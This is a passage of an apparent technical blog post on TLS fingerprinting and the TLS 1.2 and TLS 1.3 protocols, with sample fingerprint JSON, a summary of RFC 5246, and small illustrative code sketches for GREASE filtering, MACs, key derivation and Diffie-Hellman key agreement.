<span class="w"> </span><span class="nt">"user-agent"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As you can observe, the first element of <code>ciphers</code>, <code>extensions</code> and <code>supported_groups</code> seems to be chosen at random, which results in a different <code>sha3_384</code> fingerprint.</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"num_fingerprints"</span><span class="p">:</span><span class="w"> </span><span class="mi">12</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sha3_384"</span><span class="p">:</span><span class="w"> </span><span class="s2">"f18a2ee62ee0548fb09c5a31d4bbc61845cc53055c1640e381201d779a80a94e0d870fd48c2fc39fb5b15715ea731d95"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mf">1643713950.4840238</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tls_fp"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ciphers"</span><span class="p">:</span><span class="w"> </span><span class="s2">"14906,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"client_hello_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ec_point_formats"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"extensions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"64250,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,60138,21"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"record_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"signature_algorithms"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1027,2052,1025,1283,2053,1281,2054,1537"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"supported_groups"</span><span class="p">:</span><span class="w"> </span><span class="s2">"35466,29,23,24"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"user-agent"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p><strong>Solution:</strong> I will only consider non-Reserved and non-Unassigned values for <code>ciphers</code>, <code>extensions</code> and <code>supported_groups</code> in the TLS fingerprint.</p>
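<p>A minimal sketch of such a filter. It rests on my assumption that the random-looking values are GREASE code points as defined in RFC 8701 (values of the form <code>0x?A?A</code>, which IANA lists as reserved). It does not handle unassigned values, and the function names are made up.</p>

```python
def is_grease(value):
    """GREASE values have two identical bytes whose low nibble is 0xA."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def strip_grease(csv):
    """Drop GREASE values from a comma-separated list of code points."""
    return ",".join(v for v in csv.split(",") if not is_grease(int(v)))


# The cipher lists and supported groups from the two handshakes above.
ciphers_1 = "31354,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"
ciphers_2 = "14906,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"
groups_1 = "47802,29,23,24"
groups_2 = "35466,29,23,24"

print(strip_grease(ciphers_1) == strip_grease(ciphers_2))
print(strip_grease(groups_1))
```

<p>With this filter, the cipher suites and supported groups of both handshakes become identical. The two <code>extensions</code> lists would still differ, because the second handshake additionally contains extension 21, so the extension list needs extra care.</p>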
<h2>Recommended Reading List</h2>
<p>So you want to start fingerprinting TLS connections? It's plenty of fun. For me, the following reading list was very helpful:</p>
<ol>
<li><a href="https://resources.sei.cmu.edu/asset_files/Presentation/2019_017_001_539902.pdf">Slides - The Generation and Use of TLS Fingerprints</a> - Cisco is doing advanced TLS fingerprinting and they <a href="https://github.com/cisco/joy">open sourced</a> some of their TLS fingerprinting methodology and fingerprint database. They also discuss the subject in a blog article named <a href="https://blogs.cisco.com/security/tls-fingerprinting-in-the-real-world">TLS Fingerprinting in the Real World</a>.</li>
<li>A rather new paper by researchers from the Technical University of Munich named <a href="https://www.net.in.tum.de/fileadmin/TUM/NET/NET-2020-04-1/NET-2020-04-1_04.pdf">TLS Fingerprinting Techniques</a> is also a highly recommended read about TLS fingerprinting.</li>
<li>Another great read is a blog article named <a href="https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967">TLS Fingerprinting with JA3 and JA3S from Salesforce</a> which explains in-depth how Salesforce's JA3 and JA3S TLS fingerprinting works. The code for <a href="https://github.com/salesforce/ja3">JA3 and JA3S is open sourced</a>.</li>
</ol>
<h2>Introduction</h2>
<p>TLS stands for <em>Transport Layer Security</em> and is the successor of the deprecated Secure Sockets Layer (SSL) protocol. TLS is a client / server protocol that allows connections to be cryptographically <em>secure</em>.</p>
<p>TLS and SSL are application layer protocols, which means that they are situated above the Transport Layer (such as TCP and UDP) and of course also above the Network Layer (with IPv4 and IPv6 being the most prominent protocols in the Network Layer). This means that a TLS connection establishment occurs after the TCP/IP handshake and before message exchanges from protocols such as FTP or HTTP.</p>
<p>Nevertheless, TLS is a protocol on the same application layer level as the protocols FTP or HTTP. This can be confusing, since we often speak of FTPS (FTP over TLS) and HTTPS (Hypertext Transfer Protocol Secure). Are those completely new protocols then? Yes and no! HTTPS is the same as HTTP, but the protocol is encapsulated by a secure channel that is established by TLS.</p>
<p><a href="https://en.wikipedia.org/wiki/Transport_Layer_Security#Description">The TLS Wikipedia Article</a> explains this in a very good way:</p>
<blockquote>
<p>TLS and SSL do not fit neatly into any single layer of the OSI model or the TCP/IP model. TLS runs "on top of some reliable transport protocol (such as TCP)", which would imply that it is above the transport layer. It serves encryption to higher layers, which is normally the function of the presentation layer. However, applications generally use TLS as if it were a transport layer, even though applications using TLS must actively control initiating TLS handshakes and handling of exchanged authentication certificates.</p>
</blockquote>
<p>TLS is an Internet Engineering Task Force (IETF) standard and was first defined in 1999. Nowadays, the most relevant TLS versions are TLS 1.2 and TLS 1.3, which are defined in separate RFCs:</p>
<ol>
<li>TLS 1.2 is defined in <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a> and dates back to August 2008.</li>
<li>TLS 1.3 was released 10 years later in August 2018. TLS 1.3 is defined in <a href="https://datatracker.ietf.org/doc/html/rfc8446">RFC 8446</a> and is the latest major TLS release.</li>
</ol>
<p>But what security properties does the TLS protocol offer exactly?</p>
<ul>
<li>
<p>A TLS connection is secure / confidential because every transmitted byte is encrypted by a symmetric cryptographic algorithm. The symmetric key is generated freshly for each new protocol instance. When the common secret between client and server is derived with an ephemeral Diffie-Hellman key exchange, this gives us <em>forward secrecy</em>.</p>
</li>
<li>
<p>The identity of the server can be authenticated with public-key cryptography. The client can verify the authenticity of the server by verifying the server certificate. Whereas authentication for the server is mandatory, it is optional for the client.</p>
</li>
<li>
<p>A TLS connection is reliable, since each message is protected by a message authentication code (MAC), which prevents undetected loss and modification of data in transmission (For example by a man-in-the-middle attacker).</p>
</li>
</ul>
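<p>To illustrate the last property, here is a simplified sketch of how a keyed MAC detects tampering. It is not the exact TLS construction (the real record MAC also covers a sequence number and the record header). The key and the function names are placeholders.</p>

```python
import hashlib
import hmac

TAG_LEN = 32  # size of an HMAC-SHA256 tag in bytes


def protect(key, message):
    """Append an HMAC-SHA256 tag to the message."""
    tag = hmac.new(key, message, hashlib.sha256).digest()
    return message + tag


def verify(key, protected):
    """Return the message if the tag is valid, else raise ValueError."""
    message, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed")
    return message


key = b"placeholder-mac-key"
wire = protect(key, b"GET / HTTP/1.1")
print(verify(key, wire))
```

<p>Flipping a single bit of <code>wire</code> makes <code>verify</code> raise, which is exactly the "no undetected modification" guarantee.</p>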
<h1>TLS 1.2 - An RFC 5246 Summary</h1>
<p>In the following sections, I will summarize the most important aspects of <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a>. Some text sections are direct quotes from <a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a>. Most of it is summarized and extended.</p>
<p>The RFC states that TLS is a protocol that provides privacy and data integrity between two communication partners. The TLS protocol is composed of two layers:</p>
<ol>
<li>the TLS Record Protocol and </li>
<li>the TLS Handshake Protocol.</li>
</ol>
<p>The TLS Record Protocol provides connection security with two basic properties:</p>
<ol>
<li>The connection is private. This is done with symmetric data encryption. The symmetric key is negotiated with the TLS Handshake Protocol.</li>
<li>The connection is reliable. Message integrity is protected with a keyed MAC.</li>
</ol>
<p>The TLS Record Protocol is the underlying protocol of every TLS message, including the messages of the TLS Handshake Protocol.</p>
<p>The TLS Handshake Protocol provides connection security that has three basic properties:</p>
<ol>
<li>
<p><strong>Authentication</strong>: The peer's identity can be authenticated using asymmetric, or
public key, cryptography. This authentication is optional, but is usually required for
the TLS server.</p>
</li>
<li>
<p><strong>Man-in-the-middle resistance</strong>: The negotiation of a shared secret is secure and unavailable to eavesdroppers.
The secret cannot be obtained by a man-in-the-middle attacker.</p>
</li>
<li>
<p><strong>Integrity</strong>: The negotiation is reliable: no attacker can modify the
negotiation communication without being detected.</p>
</li>
</ol>
<p>One advantage of TLS is that it is application protocol independent.
Higher-level protocols can layer on top of the TLS protocol transparently.</p>
<h2>The TLS 1.2 Record Protocol</h2>
<p>The TLS Record Protocol is a layered protocol.</p>
<p><a href="https://datatracker.ietf.org/doc/html/rfc5246">RFC 5246</a> states:</p>
<blockquote>
<p>At each layer, messages may include fields for length, description, and content.
The Record Protocol takes messages to be transmitted, fragments the
data into manageable blocks, optionally compresses the data, applies
a MAC, encrypts, and transmits the result. Received data is
decrypted, verified, decompressed, reassembled, and then delivered to
higher-level clients.</p>
</blockquote>
<p>RFC 5246 describes four protocols that run on top of the record layer: the handshake protocol, the alert protocol, the change
cipher spec protocol, and the application data protocol.</p>
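<p>On the wire, every record starts with a five byte header: one byte for the content type (which of the four protocols is carried), two bytes for the version and two bytes for the length. A small parsing sketch, with a function name of my own choosing:</p>

```python
import struct

CONTENT_TYPES = {
    20: "change_cipher_spec",
    21: "alert",
    22: "handshake",
    23: "application_data",
}
VERSIONS = {0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}


def parse_record_header(data):
    """Decode the 5-byte TLS record header at the start of data."""
    if len(data) < 5:
        raise ValueError("need at least 5 bytes")
    content_type, version, length = struct.unpack("!BHH", data[:5])
    return (
        CONTENT_TYPES.get(content_type, "unknown"),
        VERSIONS.get(version, hex(version)),
        length,
    )


# Header of a handshake record with record version TLS 1.0 and 512 bytes payload.
print(parse_record_header(bytes.fromhex("1603010200")))
```

<p>The version field decoded here is the record version, which is often <code>TLS 1.0</code> in a <code>ClientHello</code> even when the client supports newer versions.</p>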
<p>The TLS Handshake Protocol itself consists of a suite of three subprotocols (the handshake, change cipher spec and alert protocols). Together, they allow the peers to:</p>
<ol>
<li>Agree upon security parameters for the record layer</li>
<li>Authenticate themselves</li>
<li>Instantiate the negotiated security parameters and report error
conditions to each other</li>
</ol>
<p>The Handshake Protocol is responsible for negotiating a session,
which consists of the following items:</p>
<ol>
<li><strong>session identifier</strong> - An arbitrary byte sequence chosen by the server to identify an
active or resumable session</li>
<li><strong>peer certificate</strong> - X509v3 certificate of the peer.</li>
<li><strong>compression method</strong> - The algorithm used to compress data prior to encryption.</li>
<li><strong>cipher spec</strong> - Specifies the pseudorandom function (PRF) used to generate keying
material, the bulk data encryption algorithm (such as null, AES,
etc.) and the MAC algorithm (such as HMAC-SHA1).</li>
<li><strong>master secret</strong> - 48-byte secret shared between the client and server.</li>
<li><strong>is resumable</strong> - A flag indicating whether the session can be used to initiate new
connections.</li>
</ol>
<p>These items are then used to create security parameters for use by
the record layer when protecting raw application data. Connections
can be reused using the same session through the resumption
feature.</p>
<p>Then there is the <strong>Change Cipher Spec Protocol</strong> message: This message is sent by both the client and the
server to notify the other party that subsequent records will be
protected under the newly negotiated ciphers and keys.</p>
<p>The <strong>Alert Protocol</strong> messages convey the severity of the message
(warning or fatal) and a description of the alert. Alert messages
with a level of fatal result in the immediate termination of the
connection.</p>
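<p>An alert message is just two bytes: the level and the description. The sketch below decodes it. Only a handful of the description codes from RFC 5246 are listed, and the function name is made up.</p>

```python
ALERT_LEVELS = {1: "warning", 2: "fatal"}

# A small subset of the alert descriptions defined in RFC 5246.
ALERT_DESCRIPTIONS = {
    0: "close_notify",
    10: "unexpected_message",
    20: "bad_record_mac",
    40: "handshake_failure",
    42: "bad_certificate",
    70: "protocol_version",
}


def parse_alert(payload):
    """Return (level, description, must_close) for a 2-byte alert payload."""
    if len(payload) != 2:
        raise ValueError("an alert is exactly 2 bytes long")
    level = ALERT_LEVELS.get(payload[0], "unknown")
    description = ALERT_DESCRIPTIONS.get(payload[1], "code %d" % payload[1])
    # Fatal alerts terminate the connection immediately.
    return level, description, level == "fatal"


print(parse_alert(b"\x02\x28"))
```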
<h2>TLS 1.2 Handshake Protocol Overview</h2>
<p>The cryptographic parameters for each TLS session are produced by the
TLS Handshake Protocol, which operates on top of the TLS record
layer. When a TLS client and server start a new protocol iteration, they do the following:</p>
<ol>
<li>Client and server agree on a protocol version</li>
<li>They select cryptographic algorithms</li>
<li>They optionally authenticate each other</li>
<li>And they use public-key encryption techniques to generate shared secrets</li>
</ol>
<p>The TLS Handshake Protocol consists of the following steps:</p>
<p>In a first step, client and server exchange hello messages to agree on algorithms, exchange random
values, and check for session resumption.</p>
<p>Then they exchange the necessary cryptographic parameters to allow the client and server to agree on a premaster secret.</p>
<p>After that, they exchange certificates and cryptographic information to allow the client and server to authenticate themselves. In practice, only the server is authenticated.</p>
<p>Both generate a master secret from the premaster secret and exchanged random values.</p>
<p>Client and server provide security parameters to the record layer.</p>
<p>Finally, the protocol allows the client and server to verify that their peer has calculated the same security parameters and that the handshake occurred without tampering.</p>
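<p>The step from premaster secret to master secret can be sketched with the pseudorandom function (PRF) from RFC 5246. I assume SHA-256 as the PRF hash here, which is what most TLS 1.2 cipher suites use (some use SHA-384). The all-zero inputs are placeholders, not real handshake values.</p>

```python
import hashlib
import hmac


def p_sha256(secret, seed, length):
    """P_hash data expansion function from RFC 5246, section 5."""
    out = b""
    a = seed  # A(0) = seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()  # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def prf(secret, label, seed, length):
    """PRF(secret, label, seed) = P_hash(secret, label + seed)."""
    return p_sha256(secret, label + seed, length)


def master_secret(pre_master_secret, client_random, server_random):
    """Derive the 48-byte master secret from the premaster secret."""
    return prf(pre_master_secret, b"master secret",
               client_random + server_random, 48)


ms = master_secret(bytes(48), bytes(32), bytes([1]) * 32)
print(len(ms))
```

<p>Because both random values enter the derivation, the master secret differs for every handshake even if the premaster secret were reused.</p>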
<p>This is how the full TLS handshake occurs in more detail:</p>
<p>The client sends a <code>ClientHello</code> message to
which the server must respond with a <code>ServerHello</code> message (else a
fatal error will occur and the connection will terminate). The <code>ClientHello</code> and
<code>ServerHello</code> establish the following attributes: Protocol Version,
Session ID, Cipher Suite, and Compression Method. Additionally, two
random values are generated and exchanged: <code>ClientHello.random</code> and
<code>ServerHello.random</code>.</p>
<p>The actual key exchange uses up to four messages: the server
Certificate, the <code>ServerKeyExchange</code>, the client Certificate, and the
<code>ClientKeyExchange</code>.</p>
<p>Following the hello messages, the server will send its certificate in
a Certificate message if it is to be authenticated. Additionally, a
<code>ServerKeyExchange</code> message may be sent, if it is required, for example if
the server has no certificate, or if its certificate is for signing
only. If the server is authenticated, it may request a certificate
from the client.</p>
<p>Next, the server will send the <code>ServerHelloDone</code> message, indicating
that the hello-message phase of the handshake is complete. The
server will then wait for a client response. If the server has sent
a <code>CertificateRequest</code> message, the client MUST send the Certificate
message. The <code>ClientKeyExchange</code> message is now sent, and the content
of that message will depend on the public key algorithm selected
between the <code>ClientHello</code> and the <code>ServerHello</code>. If the client has sent
a certificate with signing ability, a digitally-signed
CertificateVerify message is sent to explicitly verify possession of
the private key in the certificate.</p>
<p>At this point, a <code>ChangeCipherSpec</code> message is sent by the client, and
the client copies the pending Cipher Spec into the current Cipher
Spec. The client then immediately sends the Finished message under
the new algorithms, keys, and secrets. In response, the server will
send its own <code>ChangeCipherSpec</code> message, transfer the pending to the
current Cipher Spec, and send its Finished message under the new
Cipher Spec. At this point, the handshake is complete, and the
client and server may begin to exchange application layer data.
Application data is not allowed to be sent prior to the
completion of the first handshake (before a cipher suite other than
TLS_NULL_WITH_NULL_NULL is established).</p>
<p>This is the full TLS Handshake Protocol Overview (* Indicates optional or situation-dependent messages):</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">Client</span><span class="w"> </span><span class="n">Server</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientHello</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">ServerHello</span><span class="w"></span>
<span class="w"> </span><span class="n">Certificate</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">ServerKeyExchange</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">CertificateRequest</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">ServerHelloDone</span><span class="w"></span>
<span class="w"> </span><span class="n">Certificate</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientKeyExchange</span><span class="w"></span>
<span class="w"> </span><span class="n">CertificateVerify</span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Finished</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">Finished</span><span class="w"></span>
<span class="w"> </span><span class="n">Application</span><span class="w"> </span><span class="k">Data</span><span class="w"> </span><span class="o"><</span><span class="c1">-------> Application Data</span>
</code></pre></div>
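<p>The message order from the diagram above can also be written down as a table and checked mechanically. This is only a minimal sketch and not taken from any TLS library: <code>FULL_HANDSHAKE</code> and <code>isValidFlight</code> are hypothetical names, and <code>ChangeCipherSpec</code> is treated like an ordinary step even though it is technically its own protocol.</p>

```javascript
// Ordered steps of the full handshake, as in the diagram above.
// optional: true marks the messages flagged with * in the diagram.
const FULL_HANDSHAKE = [
  { sender: 'client', name: 'ClientHello',        optional: false },
  { sender: 'server', name: 'ServerHello',        optional: false },
  { sender: 'server', name: 'Certificate',        optional: true  },
  { sender: 'server', name: 'ServerKeyExchange',  optional: true  },
  { sender: 'server', name: 'CertificateRequest', optional: true  },
  { sender: 'server', name: 'ServerHelloDone',    optional: false },
  { sender: 'client', name: 'Certificate',        optional: true  },
  { sender: 'client', name: 'ClientKeyExchange',  optional: false },
  { sender: 'client', name: 'CertificateVerify',  optional: true  },
  { sender: 'client', name: 'ChangeCipherSpec',   optional: false },
  { sender: 'client', name: 'Finished',           optional: false },
  { sender: 'server', name: 'ChangeCipherSpec',   optional: false },
  { sender: 'server', name: 'Finished',           optional: false },
];

// Returns true if `observed` (an array of "sender:name" strings) walks
// through FULL_HANDSHAKE in order and skips only optional steps.
function isValidFlight(observed) {
  let i = 0;
  for (const step of FULL_HANDSHAKE) {
    const key = step.sender + ':' + step.name;
    if (observed[i] === key) {
      i += 1;
    } else if (!step.optional) {
      return false; // a mandatory message is missing or out of order
    }
  }
  // Every observed message must have been consumed.
  return i === observed.length;
}
```

<p>Calling <code>isValidFlight()</code> with a list in which <code>client:Finished</code> appears before <code>client:ChangeCipherSpec</code> is rejected, because the Finished message must already be protected by the new Cipher Spec.</p>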
<p>When the client and server decide to resume a previous session, the message flow is as follows:</p>
<p>The client sends a ClientHello using the Session ID of the session to
be resumed. The server then checks its session cache for a match.
If a match is found, and the server is willing to re-establish the
connection under the specified session state, it will send a
<code>ServerHello</code> with the same Session ID value. At this point, both
client and server MUST send <code>ChangeCipherSpec</code> messages and proceed
directly to Finished messages. Once the re-establishment is
complete, the client and server can exchange application
layer data. If a Session ID match is not
found, the TLS client and server perform a full handshake.</p>
<p>Session resumption, abbreviated handshake:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="n">Client</span><span class="w"> </span><span class="n">Server</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientHello</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">ServerHello</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="o"><--------</span><span class="w"> </span><span class="n">Finished</span><span class="w"></span>
<span class="w"> </span><span class="o">[</span><span class="n">ChangeCipherSpec</span><span class="o">]</span><span class="w"></span>
<span class="w"> </span><span class="n">Finished</span><span class="w"> </span><span class="o">--------></span><span class="w"></span>
<span class="w"> </span><span class="n">Application</span><span class="w"> </span><span class="k">Data</span><span class="w"> </span><span class="o"><</span><span class="c1">-------> Application Data</span>
</code></pre></div>
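<p>The server-side decision between the abbreviated and the full handshake boils down to a cache lookup. Here is a rough sketch under simplifying assumptions: <code>sessionCache</code> and <code>answerClientHello</code> are made-up names, and random bytes stand in for the master secret that a real key exchange would produce.</p>

```javascript
const crypto = require('node:crypto');

// Hypothetical in-memory session cache: session ID -> master secret.
const sessionCache = new Map();

// Decides how the server answers a ClientHello carrying `sessionId`.
// An empty string means the client does not try to resume anything.
function answerClientHello(sessionId) {
  const cached = sessionCache.get(sessionId);
  if (cached !== undefined) {
    // Match found: echo the same session ID, reuse the stored secret and
    // proceed directly to ChangeCipherSpec and Finished.
    return { handshake: 'abbreviated', sessionId: sessionId, masterSecret: cached };
  }
  // No match: pick a fresh session ID and fall back to the full handshake.
  // Placeholder secret; a real server derives it from the key exchange.
  const freshId = crypto.randomBytes(32).toString('hex');
  const masterSecret = crypto.randomBytes(48);
  sessionCache.set(freshId, masterSecret);
  return { handshake: 'full', sessionId: freshId, masterSecret: masterSecret };
}
```

<p>A first call with an empty session ID yields a full handshake; passing the returned <code>sessionId</code> to a second call yields the abbreviated one with the same secret.</p>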
<h1>Core Improvements of TLS 1.3 compared to TLS 1.2</h1>
<p>Excellent articles on the most important differences between TLS 1.2 and TLS 1.3 can be found in</p>
<ul>
<li>
<p>an article from 2018 from Cloudflare Inc. named <a href="https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/">A Detailed Look at RFC 8446 (a.k.a. TLS 1.3)</a>, which is an excellent read on that topic</p>
</li>
<li>
<p>and another great article from thesslstore.com named <a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">TLS 1.2 vs. TLS 1.3 – What’s the difference?</a></p>
</li>
</ul>
<p>This section is heavily based on those two articles.</p>
<figure>
<img src="https://incolumitas.com/images/tls-comp.png" alt="TLS 1.2 vs TLS 1.3" />
<figcaption>Visual comparison of TLS 1.2 and TLS 1.3 (<a href="https://www.embeddedcomputing.com/technology/security/advantages-to-using-tls-1-3-faster-more-efficient-more-secure">Image source</a>)</figcaption>
</figure>
<p>The core improvements of TLS 1.3 over its predecessor TLS 1.2 are:</p>
<ul>
<li><em>Removal of legacy ciphers:</em> TLS 1.3 eliminates support for outmoded algorithms and ciphers</li>
<li><em>RSA removed:</em> TLS 1.3 eliminates RSA key exchange, mandates Perfect Forward Secrecy</li>
<li><em>Reduced handshake complexity:</em> Reduces the number of negotiations in the handshake</li>
<li><em>Fewer ciphers:</em> Reduces the number of algorithms in a cipher suite to only 2</li>
<li><em>No more CBC-mode ciphers:</em> TLS 1.3 eliminates CBC-mode block ciphers and mandates AEAD bulk encryption</li>
<li>TLS 1.3 uses HKDF cryptographic extraction and key derivation</li>
<li><em>Reduced RTTs:</em> TLS 1.3 offers 1-RTT mode and Zero Round Trip Resumption</li>
<li><em>More secure:</em> TLS 1.3 signs the entire handshake, an improvement over TLS 1.2</li>
<li><em>More curves:</em> TLS 1.3 supports additional elliptic curves</li>
</ul>
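<p>To make the HKDF item from the list above a bit more tangible: HKDF consists of an <em>extract</em> step and an <em>expand</em> step, both built on HMAC. The following is a minimal sketch of plain HKDF as I understand it from RFC 5869, using Node.js' <code>crypto</code> module. The function names <code>hkdfExtract</code> and <code>hkdfExpand</code> are mine, and TLS 1.3 wraps these steps in its own labelled key schedule, which is not shown here.</p>

```javascript
const crypto = require('node:crypto');

// HKDF-Extract: condenses the input keying material into a pseudorandom key.
// PRK = HMAC-Hash(salt, IKM)
function hkdfExtract(hash, salt, ikm) {
  return crypto.createHmac(hash, salt).update(ikm).digest();
}

// HKDF-Expand: stretches the PRK to `length` bytes of output keying material.
// T(i) = HMAC-Hash(PRK, T(i-1) | info | i), output = T(1) | T(2) | ...
// Sketch only: the limit of 255 blocks is not enforced.
function hkdfExpand(hash, prk, info, length) {
  const blocks = [];
  let previous = Buffer.alloc(0);
  let produced = 0;
  let counter = 1;
  while (length > produced) {
    previous = crypto.createHmac(hash, prk)
      .update(previous)
      .update(info)
      .update(Buffer.from([counter]))
      .digest();
    blocks.push(previous);
    produced += previous.length;
    counter += 1;
  }
  return Buffer.concat(blocks).subarray(0, length);
}
```

<p>Node.js also ships a built-in <code>crypto.hkdfSync()</code> that performs both steps at once. In real code I would use that one; the hand-written version only shows what happens inside.</p>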
<p><strong>TLS 1.2 is slow:</strong> The TLS 1.2 handshake has remained largely unchanged since TLS was first standardized in 1999, which means that it still requires two additional round trips between client and server before the connection is encrypted. This is one reason why a new TLS version was planned.</p>
<p><strong>Design goals for TLS 1.3:</strong> There were several underlying design goals that drove the development of TLS 1.3 in an open process:</p>
<ul>
<li>Reducing the number of TLS handshake RTTs</li>
<li>Encrypting more of the TLS handshake than TLS 1.2 does</li>
<li>Increasing the resilience against cross-protocol attacks</li>
<li>Removing legacy features, especially legacy ciphers</li>
</ul>
<p>The two main advantages of TLS 1.3 over TLS 1.2 are increased performance and improved security.</p>
<p><strong>Deprecation of the RSA key exchange in TLS 1.3:</strong> In the RSA key exchange, the shared secret is decided by the client. The client encrypts the chosen secret with the server's public key (obtained from the server certificate) and sends it to the server. The RSA key exchange has an important downside: It is not forward secret because it doesn’t offer an ephemeral key mode.</p>
<p>Forward secrecy is the property that prevents attackers from decrypting traffic that was recorded in the past, even if they later manage to get hold of the server's private key.</p>
<p>Put differently: If an attacker finds out the RSA private key of the server, they can decrypt all past and future traffic between the client and server that used the RSA key exchange. Obtaining the server RSA private key was possible through the <a href="https://heartbleed.com/">Heartbleed vulnerability</a>, therefore it is not a hypothetical example. The RSA key exchange is dangerous!</p>
<p>Another reason for the deprecation of RSA is the difficulty of implementing RSA encryption properly, as the infamous <a href="https://en.wikipedia.org/wiki/Daniel_Bleichenbacher">Bleichenbacher attacks</a> (<em>million-message attacks</em>) against RSA have shown. Those attacks are also known as <a href="https://www.thesslstore.com/blog/bleichenbachers-cat-rsa-key-exchange/">padding oracle attacks</a>.</p>
<p>For that reason, TLS 1.3 only supports the ephemeral Diffie-Hellman key exchange, where the client and server generate new public/private key pairs for each instance of the TLS handshake. They then establish a shared secret by each combining their own private key with the public key share received from the peer. Because a new key pair is generated for each instance, the key exchange is ephemeral and forward secret.</p>
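<p>An ephemeral Diffie-Hellman exchange can be tried out with Node.js' <code>crypto</code> module. This is just a sketch of the key agreement itself over X25519, with both parties living in the same process; <code>ephemeralHandshake</code> is a hypothetical helper name and none of the surrounding TLS messages are modelled.</p>

```javascript
const crypto = require('node:crypto');

// Simulates the key agreement of one handshake.
function ephemeralHandshake() {
  // Each side generates a fresh (ephemeral) X25519 key pair per handshake.
  const client = crypto.generateKeyPairSync('x25519');
  const server = crypto.generateKeyPairSync('x25519');

  // Only the public keys (the "key shares") cross the wire. Each side
  // combines its own private key with the public key of the peer.
  const clientSecret = crypto.diffieHellman({
    privateKey: client.privateKey,
    publicKey: server.publicKey,
  });
  const serverSecret = crypto.diffieHellman({
    privateKey: server.privateKey,
    publicKey: client.publicKey,
  });
  return { clientSecret: clientSecret, serverSecret: serverSecret };
}
```

<p>Both sides end up with the same secret, and because the key pairs are thrown away afterwards, a second call to <code>ephemeralHandshake()</code> produces an unrelated secret. That is the forward secrecy property in a nutshell.</p>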
<p>Another advantage of deprecating RSA as key exchange option: Client and server may only use the ephemeral Diffie-Hellman key exchange, so the client can save one RTT by sending the requisite randoms and inputs needed for key generation directly, without having to agree with the server whether RSA or DH should be used.</p>
<p>This leads to...</p>
<p><strong>1-RTT handshake:</strong> Due to the simpler cipher negotiation model and reduced set of key agreement options (no RSA, no user-defined DH parameters), the parameters supported by the server are easier to guess (ECDHE with X25519 or P-256 for example). This allows the client to simply send DH key shares in the first message instead of waiting until the server has confirmed which key shares it supports.</p>
<p>This leads to a one RTT handshake that looks like the following:</p>
<figure>
<img src="https://incolumitas.com/images/Single-Round-Trip-Handshake-1.png" alt="TLS 1.3 simplified handshake" />
